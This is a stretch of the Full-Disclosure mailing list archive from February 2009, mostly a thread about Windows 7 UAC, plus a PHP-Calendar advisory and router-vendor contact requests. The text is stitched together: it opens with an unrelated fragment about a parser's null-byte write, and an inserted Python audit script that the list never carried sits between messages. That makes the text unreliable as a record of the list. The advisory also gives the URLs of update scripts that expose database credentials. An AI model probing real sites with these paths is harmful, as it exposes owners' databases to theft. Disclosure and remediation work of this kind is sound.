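The unchecked parser's null byte lands on the sentinel only because the constructed file sets name_len to offsetof(arena_t, sentinel); in a real process the same write goes wherever the attacker's length value points, which is the "one null byte to an arbitrary memory address" in the advisory. The checked version applies the rule a reviewer would ask for: bound every length field against both the destination size and the bytes actually read, before the first use, and reject rather than clamp.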
From: yr42.lists at gmail.com (Yudi Rosen) Date: Fri, 6 Feb 2009 12:57:03 +0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com> But Joe the Plumber doesn't want to have to click on endless 'confirm' dialogs every time he tries to use the computer. Simply having him run as a non-admin user only fixes half the problem. On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle wrote: > I am new to the list so hello to everyone..... > > Now for the Windows 7 UAC stuff. > > 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 > down the river. > 2.) > http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News > > It all comes back to windows biggest issue, joe the plumber > shouldn't not be running as a local admin on his box. UAC problem solved! I > still dont see how redmond missed the concept. > > > > > On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey wrote: > >> ...what? >> >> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >> >>> Windows says: Hello world! Check this out, world, this is really cool. >>> Now I have, uh, something like, uh, "privileges management"! >>> >>> >>> >>> "UAC" is no more than a new commercial designation for something with >>> about 40 years. >>> And they (Redmond) are still missing the concept's point. 
>>> >>> >>> >>> >>> >>> >>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >>> wrote: >>> >> The biggest issue here is that although it's technically easy to fix >>> >> this problem (just have UAC issue an alert when somebody's messing >>> with >>> >> the system settings), it involves doing more of what end users dislike >>> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >>> >> does something bone-headed security-wise). >>> >> >>> >> Fixing this one in a way that users will put up with will be a bitch. >>> > >>> > Why not just have it not prompt if you are changing settings, except >>> for UAC settings? that would be the simple way around it >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> >>> >>> >>> -- >>> Marcio Barbado, Jr. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/1da87862/attachment.html From kevin at tux.appstate.edu Fri Feb 6 14:36:32 2009 
From: kevin at tux.appstate.edu (Kevin Wilcox)
Date: Fri, 6 Feb 2009 09:36:32 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com>
Message-ID: <5d6848b00902060636v6e6e7aa4o76b7538aa7cb1c3e@mail.gmail.com>

2009/2/6 Yudi Rosen :
> But Joe the Plumber doesn't want to have to click on endless 'confirm' dialogs every time he tries to use the computer. Simply having him run as a non-admin user only fixes half the problem.

No, it doesn't fix anywhere *near* half of the problem; it doesn't address that we have millions of people that use their computers without knowing anything about them.

"But not every car driver needs to be a mechanic!" Yes, I know this, but every driver needs to know that there are laws and rules concerning how they drive and what happens when a 1200 kilogramme car hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every driver needs to know they need to have their tyres rotated and their oil changed. There are things you must know beyond, "accelerator, decelerator and steering wheel".

"But a computer isn't going to kill anyone if someone gets infected by a virus or trojan!" Yes, I know this, too, but if you're mixing questionable software and surfing habits with online banking and shopping, it's a recipe for destruction. Welcome to identity theft and empty bank accounts.

We can either continue to pretend like it's *only* really crappy software or we can realise that it's a combination of easily exploitable software, user ignorance and user apathy.
You can give them an operating system that has been vetted and been through multiple code reviews by people that really do know secure OS design but they wouldn't be able to accomplish anything at all. So what do we do? We give them operating systems that are less secure, hope they don't shoot their feet off and turn them loose with it - but we don't shoulder the burden of training them. Some of us do but we, as a collective, do not. Until we can properly educate our users, all we are doing is trying to mitigate risk in the best ways we can while still providing them a service. I maintain that by not educating our users we are failing in that goal.

kmw

--
Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat.

From elazar at hushmail.com Fri Feb 6 14:53:41 2009
From: elazar at hushmail.com (Elazar Broad)
Date: Fri, 06 Feb 2009 09:53:41 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
Message-ID: <20090206145342.159A328040@smtp.hushmail.com>

Exactly, so we only make him click for non-system applets/utilities, and we determine that by digital signatures, which is exactly how UAC is implemented in Windows 7. With that said, now we are back to the original issue: a computer is only as smart (or dumb, my apologies to the AI crowd) as the guy who programmed it, or in other words, how hard (or easy) is it to spoof a system applet/utility? Human nature dictates (most of the time) that we can become desensitized to things that are routine or occur often; in other words, the more UAC prompts, the more blind clicking. Then again, did Joe Sixpack bother to read the first UAC prompt when he started up his shiny new Vista for the first time?

Now, if we wired UAC up to a mouse with an electrode embedded in the left mouse button, we might have a solution. Of course the voltage would need to increase slightly over the life of the mouse in order to solve the blind shock and click problem...

elazar

On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen wrote:
>But Joe the Plumber doesn't want to have to click on endless 'confirm' dialogs every time he tries to use the computer. Simply having him run as a non-admin user only fixes half the problem.
>
>On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle wrote:
>
>> I am new to the list so hello to everyone.....
>>
>> Now for the Windows 7 UAC stuff.
>>
>> 1.) It's beta.... it's not going to be perfect; wait for RC1 before selling 7 down the river.
>> 2.) http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News
>>
>> It all comes back to Windows' biggest issue: Joe the Plumber shouldn't be running as a local admin on his box. UAC problem solved!
>> I still don't see how Redmond missed the concept.
>>
>> On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey wrote:
>>
>>> ...what?
>>>
>>> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote:
>>>
>>>> Windows says: Hello world! Check this out, world, this is really cool. Now I have, uh, something like, uh, "privileges management"!
>>>>
>>>> "UAC" is no more than a new commercial designation for something about 40 years old.
>>>> And they (Redmond) are still missing the concept's point.
>>>>
>>>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard wrote:
>>>> >> The biggest issue here is that although it's technically easy to fix this problem (just have UAC issue an alert when somebody's messing with the system settings), it involves doing more of what end users dislike most about UAC (it issuing alerts to Joe Sixpack all the time when he does something bone-headed security-wise).
>>>> >>
>>>> >> Fixing this one in a way that users will put up with will be a bitch.
>>>> >
>>>> > Why not just have it not prompt if you are changing settings, except for UAC settings? That would be the simple way around it.
>>>> >
>>>>
>>>> --
>>>> Marcio Barbado, Jr.
>>>>

From elazar at hushmail.com Fri Feb 6 14:55:20 2009
From: elazar at hushmail.com (Elazar Broad)
Date: Fri, 06 Feb 2009 09:55:20 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
Message-ID: <20090206145520.C963B28040@smtp.hushmail.com>

> I maintain that by not educating our users we are failing in that goal.

With many it is in one ear, out the other, unless you are allowed to use a clue bat...

On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox wrote:
>2009/2/6 Yudi Rosen :
>
>> But Joe the Plumber doesn't want to have to click on endless 'confirm' dialogs every time he tries to use the computer. Simply having him run as a non-admin user only fixes half the problem.
>
>No, it doesn't fix anywhere *near* half of the problem; it doesn't address that we have millions of people that use their computers without knowing anything about them.
>
>"But not every car driver needs to be a mechanic!" Yes, I know this, but every driver needs to know that there are laws and rules concerning how they drive and what happens when a 1200 kilogramme car hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every driver needs to know they need to have their tyres rotated and their oil changed. There are things you must know beyond, "accelerator, decelerator and steering wheel".
>
>"But a computer isn't going to kill anyone if someone gets infected by a virus or trojan!" Yes, I know this, too, but if you're mixing questionable software and surfing habits with online banking and shopping, it's a recipe for destruction. Welcome to identity theft and empty bank accounts.
>
>We can either continue to pretend like it's *only* really crappy software or we can realise that it's a combination of easily exploitable software, user ignorance and user apathy. You can give them an operating system that has been vetted and been through multiple code reviews by people that really do know secure OS design but they wouldn't be able to accomplish anything at all.
>So what do we do? We give them operating systems that are less secure, hope they don't shoot their feet off and turn them loose with it - but we don't shoulder the burden of training them. Some of us do but we, as a collective, do not. Until we can properly educate our users, all we are doing is trying to mitigate risk in the best ways we can while still providing them a service. I maintain that by not educating our users we are failing in that goal.
>
>kmw
>
>--
>Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat.

From justin at madirish.net Fri Feb 6 15:59:18 2009
From: justin at madirish.net (Justin C. Klein Keane)
Date: Fri, 06 Feb 2009 10:59:18 -0500
Subject: [Full-disclosure] PHP-Calendar SQL Credential Disclosure
Message-ID: <498C5E56.5060109@madirish.net>

Security Risk: Moderate
Exploitable: Remotely
Vulnerability: Information disclosure
Version: Multiple Versions

PHP-Calendar (http://www.php-calendar.com) was "written for a college social group at Northeastern University to keep track of events, etc. We were previously using localendar, which I (Sean Proctor) didn't like and had some problems with. I found CST-Calendar which did most of what I wanted, but was rather ugly and missed some features that we needed. So, I gradually re-wrote CST-Calendar since that project seemed to have stopped work entirely."

This vulnerability centers around the fact that PHP-Calendar comes with update scripts to update previous versions of the software. These scripts will print to the screen the database host, username, password, database name, table prefix, and database type. This file is named in two separate conventions depending on the installed version of PHP-Calendar. In versions prior to 1.1 this file is named "update.php"; in version 1.1 two files exist, named "update08.php" and "update10.php". Calling these files via a web browser (e.g. http://targetsite.com/phpcalendar/update.php) will print a succinct message including the above described information.

Determining the version of PHP-Calendar is often trivial, as a NEWS file is included in every distribution that will reveal version information. Browsing to http://targetsite.tld/phpcalendar/NEWS will display the versioning information if that file is present.

Note that several versions of PHP-Calendar are affected by other vulnerabilities (SQL injection - http://www.securityfocus.com/bid/13405/, remote file inclusion - http://www.securityfocus.com/bid/12127/).
Remediation

Removal of the update scripts and all other unnecessary files (AUTHORS, COPYING, FAQ, INSTALL, NEWS, README, UPDATE) should remedy this vulnerability. Unfortunately, instructions about the removal of these files are not included in the installation guide or the automated install scripts.

--
Justin C. Klein Keane
http://www.MadIrish.net

From rembrandt at jpberlin.de Fri Feb 6 16:01:54 2009
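A defender-side check for the PHP-Calendar remediation above, added here as example code (it is not part of the advisory and not PHP-Calendar's own code): it walks a document root, flags the update scripts and distribution files the advisory names, and can emit a deny rule as a fallback where the files cannot be deleted outright. The file names come from the advisory; the directory layout built in demo() and the Apache 2.2 `FilesMatch` syntax are assumptions.

```python
"""Audit a PHP-Calendar document root for leftover update scripts and
distribution files (example added to the advisory; not PHP-Calendar code)."""
import os
import re
import tempfile

# Update scripts named in the advisory: update.php (pre-1.1), update08.php
# and update10.php (1.1).  They print the DB host, user, password, name,
# table prefix and type to any browser that requests them.
UPDATE_SCRIPTS = frozenset(["update.php", "update08.php", "update10.php"])

# Distribution files the advisory says to remove; NEWS reveals the version.
DOC_FILES = frozenset(["AUTHORS", "COPYING", "FAQ", "INSTALL",
                       "NEWS", "README", "UPDATE"])


def find_leftover_files(webroot):
    """Return sorted (relative_path, severity) pairs for files under
    `webroot` that should not be web-reachable in a production install."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), webroot)
            if name in UPDATE_SCRIPTS:
                findings.append((rel, "high"))   # discloses DB credentials
            elif name in DOC_FILES:
                findings.append((rel, "low"))    # version / layout disclosure
    return sorted(findings)


def apache_deny_snippet(findings):
    """Build an Apache FilesMatch block denying the found file names, for
    deployments that keep the files on disk (assumed Apache 2.2 syntax)."""
    names = sorted({os.path.basename(rel) for rel, _sev in findings})
    if not names:
        return ""
    pattern = "^(" + "|".join(re.escape(n) for n in names) + ")$"
    return "\n".join([
        '<FilesMatch "%s">' % pattern,
        "    Order allow,deny",
        "    Deny from all",
        "</FilesMatch>",
    ])


def demo():
    """Create a constructed 1.1-style install in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "phpcalendar")
        os.makedirs(os.path.join(root, "includes"))
        for rel in ("index.php", "includes/config.php", "update08.php",
                    "update10.php", "NEWS", "README"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("<?php /* constructed placeholder */ ?>\n")
        return find_leftover_files(root)


if __name__ == "__main__":
    found = demo()
    for rel, sev in found:
        print("%-5s %s" % (sev, rel))
    print(apache_deny_snippet(found))
```

Run it against a real install with `find_leftover_files("/var/www/phpcalendar")` (path assumed); a "high" finding means the database credentials are one HTTP request away, and deleting the file is the fix the advisory recommends. The deny rule is only a stop-gap, since it protects nothing if the files are later served from another path or vhost.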
From: rembrandt at jpberlin.de (rembrandt)
Date: Fri, 6 Feb 2009 17:01:54 +0100
Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues)
Message-ID: <20090206170154.07cc41e9.rembrandt@jpberlin.de>

Is somebody aware of security contacts at Netgear or D-Link?

Products of those vendors do suffer from possible DoS, probably default hardcoded root accounts (D-Link) and other issues.

Timeline:

ZDI:
Case Opened 2009-01-18 04:24 GMT-6
Case Closed 2009-01-19 14:12 GMT-6
"We are not interested in vulnerabilities affecting D-Link at this time."

Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be accepting bugs affecting NetGear products."

Contacting mitre.org, asking for CVE and a contact at D-Link: Mon, 2.02.2009, 13:01
Contacting mitre.org and NetGear asking for CVE and contact: Mon, 2.02.2009, 12:55
pressrelations at netgear.com (OSVDB entry in the contact field)
coley at linus.mitre.org (cc, found by googling)

No replies so far.

Maybe NetGear and D-Link could consider working together with the OSVDB to enter at least some valid contact data.

Somebody interested in router issues (and no, it's no XSS...)? The vendors themselves seem not to care about their customers or security...

Kind regards,
Rembrandt

From anonymouspimp at gmail.com Fri Feb 6 16:31:10 2009
From: anonymouspimp at gmail.com (anonymous pimp)
Date: Fri, 6 Feb 2009 18:31:10 +0200
Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues)
In-Reply-To: <20090206170154.07cc41e9.rembrandt@jpberlin.de>
References: <20090206170154.07cc41e9.rembrandt@jpberlin.de>
Message-ID: <2d792fb20902060831g621a26dctfb2578c9cc592114@mail.gmail.com>

On Fri, Feb 6, 2009 at 6:01 PM, rembrandt wrote:
> Is somebody aware of security contacts at Netgear or D-Link?
>
> Products of those vendors do suffer from possible DoS, probably default hardcoded root accounts (D-Link) and other issues.
>
> [...]
> Kind regards,
> Rembrandt
>

yeah at justfuckinggoogleit.com

Kind regards.

From shawnmer at gmail.com Fri Feb 6 17:00:56 2009
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Fri, 6 Feb 2009 12:00:56 -0500
Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues)
In-Reply-To: <20090206170154.07cc41e9.rembrandt@jpberlin.de>
References: <20090206170154.07cc41e9.rembrandt@jpberlin.de>
Message-ID:

On Fri, Feb 6, 2009 at 11:01 AM, rembrandt wrote:
> Is somebody aware of security contacts at Netgear or D-Link?
>
> Products of those vendors do suffer from possible DoS, probably default hardcoded root accounts (D-Link) and other issues.
>
> Timeline:
>
> ZDI:
> Case Opened 2009-01-18 04:24 GMT-6
> Case Closed 2009-01-19 14:12 GMT-6
> "We are not interested in vulnerabilities affecting D-Link at this time."

Maybe contact http://security.dlink.com.tw so they can create IPS signatures for their NetDefend products? ;-)

--sc,

From ureleet at gmail.com Fri Feb 6 17:18:30 2009
From: ureleet at gmail.com (Ureleet)
Date: Fri, 6 Feb 2009 12:18:30 -0500
Subject: [Full-disclosure] Fwd: MI5 are watching you, indeed
In-Reply-To: <4b6ee9310902050924m13d98243t665fcec685e041da@mail.gmail.com>
References: <4b6ee9310902050924m13d98243t665fcec685e041da@mail.gmail.com>
Message-ID: <6158bb410902060918t39599430n8edb132659589d05@mail.gmail.com>

just in case any1 else is being threatened by this kid.

---------- Forwarded message ----------
From: andrew.wallace
Date: Thu, Feb 5, 2009 at 12:24 PM
Subject: MI5 are watching you, indeed
To: Ureleet

From ureleet at gmail.com Fri Feb 6 17:20:47 2009
From: ureleet at gmail.com (Ureleet)
Date: Fri, 6 Feb 2009 12:20:47 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <99936.1233673785@turing-police.cc.vt.edu>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu>
Message-ID: <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com>

ms just needs to tell the developers. look, we are going to do this, here's the coding, here's the new APIs; conform or get left back.

they'll conform.

On Tue, Feb 3, 2009 at 10:09 AM, wrote:
> On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said:
>> y not have ur os secure in the first place and designed with full permissions instead of bothering the user. look at linux, look at unix. they've been doing it 4 years.
>
> Well, that *would* be an alternate way to design a system - but how would you migrate an existing Windows box to a Windows 8 that did that? There is *such* a mass of software written specifically around all the cruft in the Windows APIs that the inertia is the single biggest reason people keep running Windows boxes.
>

From ureleet at gmail.com Fri Feb 6 17:46:19 2009
From: ureleet at gmail.com (Ureleet)
Date: Fri, 6 Feb 2009 12:46:19 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To:
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com>
Message-ID: <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>

doesn't this work for other OSes?

On Fri, Feb 6, 2009 at 12:42 PM, Andy McKnight wrote:
>
> 2009/2/6 Ureleet
>> ms just needs to tell the developers. look, we are going to do this, here's the coding, here's the new APIs; conform or get left back.
>>
>> they'll conform.
>
> Yeah, I can see how that conversation will pan out.
>
> MS -> App Developers
> "Yeah, well, we're pretty much doing away with what you're used to so your app isn't going to work on the next Windows release. We need to do this to improve security, it'll be worth it for everyone in the long run. Meantime, you're going to need to recode your app."
>
> App Developers -> End User
> "Microsoft broke our app."
>
> End User
> "God damn Microsoft. That new OS is crap, nothing works on it. I won't be investing any of my hard earned cash on their new OS."
>
> If an end user's current apps don't work on the new OS, chances are they won't upgrade. It's not Microsoft that can drive app developers to recode for a new OS, it's got to be the end user.
>

From andy.mcknight at gmail.com Fri Feb 6 17:42:52 2009
From: andy.mcknight at gmail.com (Andy McKnight)
Date: Fri, 6 Feb 2009 17:42:52 +0000
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com>
Message-ID:

2009/2/6 Ureleet
> ms just needs to tell the developers. look, we are going to do this, here's the coding, here's the new APIs; conform or get left back.
>
> they'll conform.
>

Yeah, I can see how that conversation will pan out.

MS -> App Developers
"Yeah, well, we're pretty much doing away with what you're used to so your app isn't going to work on the next Windows release. We need to do this to improve security, it'll be worth it for everyone in the long run. Meantime, you're going to need to recode your app."

App Developers -> End User
"Microsoft broke our app."

End User
"God damn Microsoft. That new OS is crap, nothing works on it. I won't be investing any of my hard earned cash on their new OS."

If an end user's current apps don't work on the new OS, chances are they won't upgrade. It's not Microsoft that can drive app developers to recode for a new OS, it's got to be the end user.

From Valdis.Kletnieks at vt.edu Fri Feb 6 17:51:58 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 06 Feb 2009 12:51:58 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Fri, 06 Feb 2009 17:42:52 GMT."
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com>
Message-ID: <87091.1233942718@turing-police.cc.vt.edu>

On Fri, 06 Feb 2009 17:42:52 GMT, Andy McKnight said:
> Yeah, I can see how that conversation will pan out.
>
> MS -> App Developers
> "Yeah, well, we're pretty much doing away with what you're used to so your app isn't going to work on the next Windows release. We need to do this to improve security, it'll be worth it for everyone in the long run. Meantime, you're going to need to recode your app."
>
> App Developers -> End User
> "Microsoft broke our app."
>
> End User
> "God damn Microsoft. That new OS is crap, nothing works on it. I won't be investing any of my hard earned cash on their new OS."

Exactly - and the *only* thing that MS cares about is getting your hard earned cash. That's why they didn't fix this in Vista, or XP, or ME, or W2K, or NT 4, or....

The unbelievers are welcome to look at how many corporate sites have drunk the Vista Kool-Aid - very few. About the only Vista sales MS has are the ones they've had pre-loaded onto computers as they leave the factory.

From andy.mcknight at gmail.com Fri Feb 6 17:58:12 2009
From: andy.mcknight at gmail.com (Andy McKnight)
Date: Fri, 6 Feb 2009 17:58:12 +0000
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
Message-ID:

2009/2/6 Ureleet
> doesn't this work for other OSes?

Windows is different in this respect. The number of Windows users who don't know/care (or *want* to know) what goes on under the hood is *huge*. As long as their current setup allows them to *do their job* then they're not going to buy into any upgrade that risks breaking that. That's what's important to them.

The biggest driver behind upgrading a Windows OS isn't a new release, or security improvements or a fancy GUI. It's hardware replacement. Even this was/is stretched with XP with the extended shipment dates and various downgrade options you can *still* get on new boxes.

The only people that can really force app developers to change overnight* and code for a new, secure Windows OS mostly don't care about it. That leaves Microsoft to try and drip feed gradual change that improves the situation without rocking the boat.

*relatively.

From vigilantgregorius at gmail.com Fri Feb 6 18:02:56 2009
From: vigilantgregorius at gmail.com (Miller Grey)
Date: Fri, 6 Feb 2009 12:02:56 -0600
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To:
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
Message-ID:

...knowing all this, how does it get fixed? What is the proper way for MS to enforce UAC?

On Fri, Feb 6, 2009 at 11:58 AM, Andy McKnight wrote:
>
> 2009/2/6 Ureleet
>
>> doesn't this work for other OSes?
>
> Windows is different in this respect. The number of Windows users who don't know/care (or *want* to know) what goes on under the hood is *huge*. As long as their current setup allows them to *do their job* then they're not going to buy into any upgrade that risks breaking that. That's what's important to them.
>
> The biggest driver behind upgrading a Windows OS isn't a new release, or security improvements or a fancy GUI. It's hardware replacement. Even this was/is stretched with XP with the extended shipment dates and various downgrade options you can *still* get on new boxes.
>
> The only people that can really force app developers to change overnight* and code for a new, secure Windows OS mostly don't care about it. That leaves Microsoft to try and drip feed gradual change that improves the situation without rocking the boat.
>
> *relatively.
>
From Valdis.Kletnieks at vt.edu Fri Feb 6 18:07:40 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 06 Feb 2009 13:07:40 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Fri, 06 Feb 2009 12:46:19 EST." <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
Message-ID: <88045.1233943660@turing-police.cc.vt.edu>

On Fri, 06 Feb 2009 12:46:19 EST, Ureleet said:
> doesn't this work for other OSes?

Much of the competition are all Unix/Linux based, and as such the APIs are *very* similar from one to another. As a result, you get 2 effects:

1) MacOS X, Solaris, RedHat Enterprise (and so on) all have mostly the same POSIX API, so a vendor can get stuff working on one, and have a pretty easy time moving to another. If you're being careful in your coding and avoiding most of the weirder vendor-specific extensions, moving from (for instance) Solaris to RHEL is actually easier than XP->Vista. So if your OS vendor screws the pooch, you can often get your application for another system.

2) Since there *isn't* as strong a lock-in as with a Microsoft OS, all the OS vendors have a big incentive to *not* screw the pooch by making radical incompatible changes - they get done in evolutionary compatible ways. And since the OS is all open-source, an enhancement done by one vendor will eventually show up in the others if it's a useful feature (there's been a number of things that have over the years crossed from Linux into the *BSD/Darwin/OSX world and vice versa).

Also, most of the open-source companies have a totally different business model.
They can't make much money selling me open-source bits - what we pay them for is *support*. I hit a bug, but I have better things to do than track it down - I throw it at the vendor, and they do the bugfixing and ship me a new version. A new release of OpenOffice comes out, with different pre-requisites, I pay the vendor to sort it all out and build it to save me the time and effort.

So Microsoft has good economic reasons to *not* fix stuff so they keep their customers captive - while RedHat's survival depends on them shipping me stuff that *works*. Different market niche, different mindset, different results.

From Valdis.Kletnieks at vt.edu Fri Feb 6 18:14:59 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 06 Feb 2009 13:14:59 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Fri, 06 Feb 2009 12:02:56 CST."
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com>
Message-ID: <88499.1233944099@turing-police.cc.vt.edu>

On Fri, 06 Feb 2009 12:02:56 CST, Miller Grey said:
> ...knowing all this, how does it get fixed? What is the proper way for MS to enforce UAC?

I'm quite frankly not convinced that there is in fact any economically feasible way for MS to ship a "proper" UAC. Both Vista and the upcoming Windows 7 were at first seen by outsiders as a good chance for MS to do the needed disruptive house cleaning, and they didn't do it for either of those releases. They still took a major beating on their cash flow with the Vista failure, and it would have been worse if it had been the amount of changes that were needed to actually fix things. And since there's a good chance that the world economy will remain in the toilet until after the follow-on for Windows 7 arrives, I'm not holding my breath for MS to do the major clean-up there either. There's good reason to suspect that they will *never* actually do so.

Bottom line: MS can do only one of the following:

1) Ship something that fixes UAC (and all the other related issues)
2) Ship something that fixes their profit/loss sheets.
